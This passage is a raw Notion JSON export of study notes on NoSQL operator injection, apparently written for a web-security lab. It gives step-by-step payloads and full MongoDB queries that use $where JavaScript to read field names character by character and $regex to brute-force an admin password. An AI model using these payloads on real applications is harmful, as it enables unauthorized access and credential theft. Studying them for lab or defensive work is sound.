","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8074-8123-eb5df2d12486","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Next, test ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Next, test ","href":null},{"type":"text","text":{"content":"^ab*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^ab*","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"^abc*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^abc*","href":null},{"type":"text","text":{"content":", etc. until you recover the full password.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc. until you recover the full password.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d9-82f3-ed37424bd339","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"heading_3","heading_3":{"rich_text":[{"type":"text","text":{"content":"In short:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"In short:","href":null}],"is_toggleable":false,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8079-bef4-e2dba468abc4","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" lets you run JavaScript → you can list field names or even extract data directly.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" lets you run JavaScript → you can list field names or even extract data directly.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8029-9683-f0541492bb5a","parent":{"type":"block_id","block_id":"251dc9c5-3059-8028-8950-ef9db96adabd"},"created_time":"2025-08-16T13:12:00.000Z","last_edited_time":"2025-08-16T13:13:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":" works without JavaScript → you can brute-force field values character by character.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" works without JavaScript → you can brute-force field values character by character.","href":null}],"color":"default"},"archived":false}]}]},{"object":"block","id":"251dc9c5-3059-805d-9864-f5280c0952e5","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:40:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"NoSQL Operator Injection – Attack Flow","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"blue"},"plain_text":"NoSQL Operator Injection – Attack Flow","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:39:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 1 – Test if ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 1 – Test if ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" or other operators are evaluated.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" or other operators are evaluated.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8088-8145-c963037a5430","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Check if the application processes extra operators (like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Check if the application processes extra operators (like ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":").","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":").","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f4-ab17-cf223c0dd733","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payloads:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payloads:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c6-b129-c9faec0dc239","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"wiener\",\"password\":\"peter\",\"$where\":\"0\"}\n{\"username\":\"wiener\",\"password\":\"peter\",\"$where\":\"1\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"wiener\",\"password\":\"peter\",\"$where\":\"0\"}\n{\"username\":\"wiener\",\"password\":\"peter\",\"$where\":\"1\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d0-b6aa-e8ec7003a561","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full Queries:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full Queries:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-802d-a8a5-e1db45220e89","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"username\":\"wiener\",\n \"password\":\"peter\",\n \"$where\":\"0\"\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"username\":\"wiener\",\n \"password\":\"peter\",\n \"$where\":\"0\"\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8032-bc43-cf50ce9af8f2","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"username\":\"wiener\",\n \"password\":\"peter\",\n \"$where\":\"1\"\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"username\":\"wiener\",\n \"password\":\"peter\",\n \"$where\":\"1\"\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f9-a647-f012967364c2","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-809e-8410-de03901bebd1","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" is evaluated → response changes between ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is evaluated → response changes between ","href":null},{"type":"text","text":{"content":"0","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"0","href":null},{"type":"text","text":{"content":" (false) and ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (false) and ","href":null},{"type":"text","text":{"content":"1","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"1","href":null},{"type":"text","text":{"content":" (true).","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" (true).","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f2-9cc4-cb277d94e0a5","parent":{"type":"block_id","block_id":"251dc9c5-3059-806c-9dc6-dac90a7cbf01"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If no change → ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If no change → ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" likely ignored.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" likely ignored.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-807f-83d5-e6cea86d7100","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 2 – If JavaScript allowed → extract field names with ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 2 – If JavaScript allowed → extract field names with ","href":null},{"type":"text","text":{"content":"Object.keys()","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"Object.keys()","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8066-a78f-fae07a906c53","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Identify field names character by character.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Identify field names character by character.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d7-9f6c-db0e1cb97b86","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e9-9d9c-ea06ac3fde5b","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-8067-8b04-c903bca916e8","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full Query:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8068-9418-eff911a5886a","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"$where\":\"Object.keys(this)[0].match('^.{0}a.*')\"\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8074-a24e-cedb018344d7","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8021-b716-ef0ff37e8034","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If response is different → first character of field name is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If response is different → first character of field name is ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8004-9a31-d1b754057874","parent":{"type":"block_id","block_id":"251dc9c5-3059-807f-83d5-e6cea86d7100"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Change regex offset (","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Change regex offset (","href":null},{"type":"text","text":{"content":"^.{1}b.*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^.{1}b.*","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"^.{2}c.*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^.{2}c.*","href":null},{"type":"text","text":{"content":", …) to extract full name.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", …) to extract full name.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-80ab-8841-ec5a799c6570","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:36:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 3 – If JavaScript blocked → test ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 3 – If JavaScript blocked → test ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":" injection.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" injection.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-80a3-b3c5-fe01cd8cbad5","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" If JavaScript is blocked, try operators like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" If JavaScript is blocked, try operators like ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-800c-9ef9-cd21c0cd95b6","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80fc-9d4c-d5bc9e9f2058","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^.*\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^.*\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-8043-91d4-e1be138bb5c6","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full Query:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d4-9ab5-ccdeeb699d0d","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"username\":\"admin\",\n \"password\": { \"$regex\": \"^.*\" }\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"username\":\"admin\",\n \"password\": { \"$regex\": \"^.*\" }\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8059-8815-ebb0808d4e31","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected 